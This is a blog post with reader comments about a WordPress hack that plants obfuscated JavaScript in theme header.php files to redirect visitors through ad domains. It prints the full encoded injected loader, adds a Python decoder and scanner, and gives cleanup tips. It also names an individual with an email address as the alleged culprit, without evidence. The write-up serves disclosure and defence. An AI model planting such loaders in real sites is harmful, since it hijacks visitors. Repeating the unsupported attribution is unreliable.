Was Your Site Hacked? Redirecting to itsallbreaksoft.net or paymoneysystem.info? Here’s What Happened.


There is a brand new WordPress hack making the rounds that redirects all traffic to your site through itsallbreaksoft.net and paymoneysystem.info, and then on to any number of junk sites full of ads. The intermediate redirect to paymoneysystem.info actually goes through the URL paymoneysystem.info/in.cgi?michaeleknowlton, suggesting that someone using the name Michael Knowlton is going to be benefiting from any monies earned by the advertising. Here’s how it was done, and how to fix it. Fortunately, the immediate fix is very easy.

Here is how it was done: the bad guys either injected the code below into the header.php file (this is found in your /wp-content/themes/{your theme name here}/ directory), or they simply sucked down your header file, modified it on their end to include the code below, and then overwrote your header.php file with the newly modified one.

This is the code that has been added to your header.php file:

<script language=javascript>document.write(unescape('%3C%73%63%72%69
%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72
%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B
%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75
%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B
%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C
%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72
%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E
%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73
%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F
%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70
%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%
264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%
264E%266D%2633%2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/
ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%
2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%
2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%
264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou
%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%
264Eopuefgjof%2633%2C%2633%266D%2633%264F%264D%266D0tdsjqu%
264F%2633%263%3A%264C%264D0tdsjqu%264F%261B%264Dtdsjqu%264F%
261Bjg%2639uzqfpg%2639i%263%3A%264E%264E%2633voefgjofe%2633%
263%3A%268C%261%3A%261B%261%3Aepdvnfou/xsjuf%2639%2633%
264Djgsbnf%2631tsd%264E%2638iuuq%264B00jutbmmcsfbltpgu/
ofu0uet0jo/dhj%264G4%2637tfpsfg%264E%2633%
2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%
2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%
264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou
%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%
264Eopuefgjof%2638%2631xjeui%264E2%2631ifjhiu%264E2%
2631cpsefs%264E1%2631gsbnfcpsefs%264E1%264F%264D0jgsbnf%264F
%2633%263%3A%264C%2631%261B%268E%261Bfmtf%2631jg%2639i/
joefyPg%2639%2633iuuq%264B%2633%263%3A%264E%264E1%263%3A%
268C%261B%261%3A%261%3Axjoepx/mpdbujpo%264Ei%264C%261B%268E%
261B%264D0tdsjqu%264F1')

This gobbledygook actually resolves to a script that redirects your visitors to itsallbreaksoft.net and on to paymoneysystem.info, through “Michael Knowlton’s” affiliate ID.
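As an added example (not code from the original article), here is a Python decoder that reverses the dF() transformation the injected script uses, together with a static check that flags the two-stage loader in a theme file and decodes both stages without executing anything; the sample header and the redirector.example URL are constructed for illustration.

```python
import re
from urllib.parse import quote, unquote

def decode_df(payload: str) -> str:
    """Reverse the injected dF() routine without executing it.

    The payload's last character is a digit used as a Caesar shift; the rest
    is URL-encoded text whose characters were each shifted up by that amount,
    and the unshifted result is URL-encoded once more.
    """
    if not payload[-1:].isdigit():
        raise ValueError("dF payload must end in the shift digit")
    shift = int(payload[-1])
    shifted = unquote(payload[:-1])
    unshifted = "".join(chr(ord(c) - shift) for c in shifted)
    return unquote(unshifted)

def encode_df(plaintext: str, shift: int = 1) -> str:
    """Inverse of decode_df, used here only to build a constructed sample."""
    shifted = "".join(chr(ord(c) + shift) for c in quote(plaintext, safe=""))
    return quote(shifted, safe="") + str(shift)

STAGE1 = re.compile(r"document\.write\(unescape\('([^']+)'\)\)")
DF_CALL = re.compile(r"dF\('([^']+)'\)")

def audit_theme_file(source: str) -> dict:
    """Flag the two-stage loader in a theme file and decode both stages.

    Stage 1 is a plain unescape() of the dF() function body; stage 2 is the
    shifted payload handed to dF(). Decoding them statically exposes the
    redirect targets so they can be blocked and searched for elsewhere.
    """
    m1 = STAGE1.search(source)
    m2 = DF_CALL.search(source)
    return {
        "infected": bool(m1 and m2),
        "stage1": unquote(m1.group(1)) if m1 else None,
        "stage2": decode_df(m2.group(1)) if m2 else None,
    }

# Constructed sample, not the real injected file: the same loader shape
# wrapped around a placeholder redirector URL (redirector.example).
SAMPLE_PAYLOAD = '<script src="http://redirector.example/in.cgi?2"></script>'
SAMPLE_HEADER = (
    "</head>\n<body>\n<script language=javascript>document.write(unescape('"
    + quote("<script>function dF(s){/* shifted decoder */}</script>", safe="")
    + "'));dF('" + encode_df(SAMPLE_PAYLOAD) + "')</script>\n"
)

if __name__ == "__main__":
    print(audit_theme_file(SAMPLE_HEADER))
```

Running decode_df on the real blob above (the text between dF(' and ') ) yields the plain script, whose redirect host can then be grepped for across every theme and upload file.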


To perform an immediate fix, simply remove the code from your header.php file, and then make sure that your header.php file isn’t writable by anyone other than you.

It turns out that the people behind this seem to be a pretty well-known group from Russia, with the main person being one Sergey Ryabov, who uses the email address director@climbing-games.com. [Ed. Note: We’d love to talk with Mr. Ryabov, to learn more about his operations and how and why he’s able to pull off this kind of hijinks.]

As to how they were able to do this, it’s not yet clear, but if you are running an old version of WordPress – especially a 2.6x version – be sure to upgrade if at all possible.

We also were recently turned onto a great WordPress firewall plugin that is very small and very easy to install, and you can check out the WordPress Firewall plugin here.


23 thoughts on “Was Your Site Hacked? Redirecting to itsallbreaksoft.net or paymoneysystem.info? Here’s What Happened.”

  1. Hi,
    I have a similar thing happening with my WordPress site. I’ve so far removed a whole lot of gobbledygook from header.php, footer.php, index.php, page.php, etc., etc. It looks like they have left their mess on every page. Nothing in my uploads as far as I can see. Will try to resolve it. I noted that this unusual URL was in the bottom part of my index page: http://nowisisdudescars dot com/js.php
    Any thoughts? Thanks :)

  2. Thank you very much, my blog was attacked this morning by this hacker and I did what you told and it’s OK now.

    Fernanda

  3. Yeah, I was hacked too. Have saved the code by the way, because hacking back is legal in Holland :)

  4. I had 2 admins on there, god knows how, as I didn’t create it and he had this long javascript link in his profile on this admin. I’ve changed all my pws now, god knows how they did it!

    Woc

  5. I, too, had this happen. Googled the redirect domain, clicked the first listing and came straight to this page – carried out the advice and was back in business in 2 minutes. Thanks! As Anne suggested, I also checked my uploads folder and found a file called 928990.php, which was inserted way back on Sept. 23, 2009 – and yet my page didn’t go down until today or yesterday (I was alerted by the sudden lack of spam posts, ironically!)

    Checked the permissions on header.php – guess what? Read, Write and Execute permissions are set to “Owner” only. Somehow this hack must convince the server that the hacker is the “Owner”. Scary. Will check my database also, but can’t get access just now – my service provider has screwed up my service level again.

    Thanks again everyone!
    ~Wendy

  6. Many thanks for this post, as I wondered what the hell was happening with my blog, many thanks again !!!

    Woc

  7. THANK YOU! You just saved my blog :). I was hit on February 4th, apparently, but just noticed a few days ago and thought it was a temporary DNS glitch. BTW: (chmod -r header.php) doesn’t hurt!

  8. I had an extra .php file in my uploads folder for 9/2009. Does it mean the website was infected already then??

  9. Like you said: check the uploads folder, in my case there were some dodgy php files. Also check the users of your blog, there was one unknown admin in my list.
    How did he get there??

  10. How to remove Trojan: Backdoor

    https://web.archive.org/web/20130127145531/http://www.tips29.com/2009/01/how-to-remove-trojan-backdoor.html

  11. Thanks for sharing this info. This will help a lot of people solve this problem. Be sure when removing all the code that you also take every precaution that you can to secure your WordPress site, including very strong passwords (hosting account, ftp, and wp-admin), updates, permissions, and use SFTP when uploading. Don’t forget to do daily backups too!

  12. To answer DBEV, unless you have direct access to your server you can’t chmod (change permissions) on any file with ‘commands’. You need to FTP into the server and use the FTP client to set permission for this file. You can see the read, write and execute permissions depending on your FTP client.

  13. I just went and fixed this. I think. If this has happened to you, CHECK YOUR UPLOADS FOLDER. Check them all. I found a file named ‘845530.php’ in one of these directories.

    After decoding, it appears to be a backdoor file letting them, among other things, email themselves your SQL DB (I’m not 100% sure on that point; I’ve only glanced over the code). However, it’s VERY, VERY bad. Upgrade, check for that PHP file and delete any users (especially admin users) that you don’t recognize.

  14. THANK YOU! I was afraid I was going to have to reinstall everything and I am SO glad I found your fix! Shared on FB and twitter to all my tech savvy friends!

  15. Also make sure to check the user table (directly in the database). I had a new admin in there with javascript as name which hid it from the user list.
    It still bothers me though that I don’t know how he got in there in the first place.

  16. Thank you so much for this post. I host a web blog for an elementary school and a lot of those redirects were definitely NOT kid appropriate. You saved me from a ton of angry emails from parents.

  17. Thanks for your help! You’ve been the first reliable source for the solution of the problem. Therefore you saved three servers. The infection occurred on February the 5th at 6pm in Germany. Do you know anything about the origin?

    Greetings from a little village near Hamburg,

    HP

  18. Thank you for this info. Deleted the content and it appears to have been fixed. Haven’t seen any redirects.

    My question is based on your recommendation “…make sure that your header.php file isn’t writable by anyone other than you.” I can’t find commands to enable me to do that. Suggestions?

  19. Thank you, thank you, thank you.
    Almost lost my mind. But there seems to be more. Script removed, the redirect is delayed, but still goes.
